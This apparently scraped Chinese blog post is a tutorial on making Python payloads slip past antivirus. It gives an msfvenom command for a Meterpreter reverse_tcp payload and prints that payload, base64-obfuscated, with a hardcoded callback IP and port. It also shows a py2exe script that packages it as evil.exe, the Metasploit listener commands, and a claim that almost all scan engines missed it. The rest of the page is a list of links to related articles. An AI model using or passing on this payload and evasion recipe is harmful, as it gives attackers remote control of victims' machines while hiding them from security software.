使用Python进行防病毒免杀解析


Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py,生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe,获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org 

参考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

Python 相关文章推荐
通过C++学习Python
Jan 20 Python
编写同时兼容Python2.x与Python3.x版本的代码的几个示例
Mar 30 Python
Python 递归函数详解及实例
Dec 27 Python
Python实现简单的语音识别系统
Dec 13 Python
python实现遍历文件夹修改文件后缀
Aug 28 Python
python将list转为matrix的方法
Dec 12 Python
Django REST framework视图的用法
Jan 16 Python
详解python--模拟轮盘抽奖游戏
Apr 12 Python
python读取多层嵌套文件夹中的文件实例
Feb 27 Python
解决python多线程报错:AttributeError: Can't pickle local object问题
Apr 08 Python
详解python logging日志传输
Jul 01 Python
利用Python实现自动扫雷小脚本
Dec 17 Python
python 使用shutil复制图片的例子
Dec 13 #Python
基于python traceback实现异常的获取与处理
Dec 13 #Python
python 实现批量替换文本中的某部分内容
Dec 13 #Python
django多种支付、并发订单处理实例代码
Dec 13 #Python
Python+OpenCV+图片旋转并用原底色填充新四角的例子
Dec 12 #Python
Python+OpenCV 实现图片无损旋转90°且无黑边
Dec 12 #Python
使用python去除图片白色像素的实例
Dec 12 #Python
You might like
正则表达式语法
2006/10/09 Javascript
一个简单的PHP验证码实现代码
2014/05/10 PHP
PHP常用工具函数小结【移除XSS攻击、UTF8与GBK编码转换等】
2019/04/27 PHP
Javascript学习笔记6 prototype的提出
2010/01/11 Javascript
当前页禁止复制粘贴截屏代码小集
2013/07/24 Javascript
jquery 定位input元素的几种方法小结
2013/07/28 Javascript
JS利用cookie记忆当前位置的防刷新导航效果
2015/10/15 Javascript
AngularJS身份验证的方法
2016/02/17 Javascript
Jquery Easyui菜单组件Menu使用详解(15)
2016/12/18 Javascript
jquery封装插件时匿名函数形参和实参的写法解释
2017/02/14 Javascript
vue实现登录后页面跳转到之前页面
2018/01/07 Javascript
详解vue+vuex+koa2开发环境搭建及示例开发
2018/01/22 Javascript
Vue的轮播图组件实现方法
2018/03/03 Javascript
详解如何使用node.js的开发框架express创建一个web应用
2018/12/20 Javascript
vue watch关于对象内的属性监听
2019/04/22 Javascript
Ant Design Vue 添加区分中英文的长度校验功能
2020/01/21 Javascript
Postman无法正常返回结果问题解决
2020/08/28 Javascript
Python中实现对list做减法操作介绍
2015/01/09 Python
python模仿网页版微信发送消息功能
2018/02/24 Python
python pandas中对Series数据进行轴向连接的实例
2018/06/08 Python
python网络应用开发知识点浅析
2019/05/28 Python
python实现列表中最大最小值输出的示例
2019/07/09 Python
python实现批量修改服务器密码的方法
2019/08/13 Python
Python进程,多进程,获取进程id,给子进程传递参数操作示例
2019/10/11 Python
python中的列表和元组区别分析
2020/12/30 Python
HTML5的一个显示电池状态的API简介
2015/06/18 HTML / CSS
彪马香港官方网上商店:PUMA香港
2020/12/06 全球购物
我们在web应用开发过程中经常遇到输出某种编码的字符,如iso8859-1等,如何输出一个某种编码的字符串?
2014/03/30 面试题
高中生自我评语大全
2014/01/19 职场文书
消防安全检查制度
2014/02/04 职场文书
在校大学生个人的自我评价
2014/02/13 职场文书
电气工程及其自动化专业毕业生自荐信
2014/06/21 职场文书
导游词之凤凰古城
2019/10/22 职场文书
Pandas实现批量拆分与合并Excel的示例代码
2022/05/30 Python
Win11运行cmd提示“请求的操作需要提升”的两种解决方法
2022/07/07 数码科技
Spring Boot优化后启动速度快到飞起技巧示例
2022/07/23 Java/Android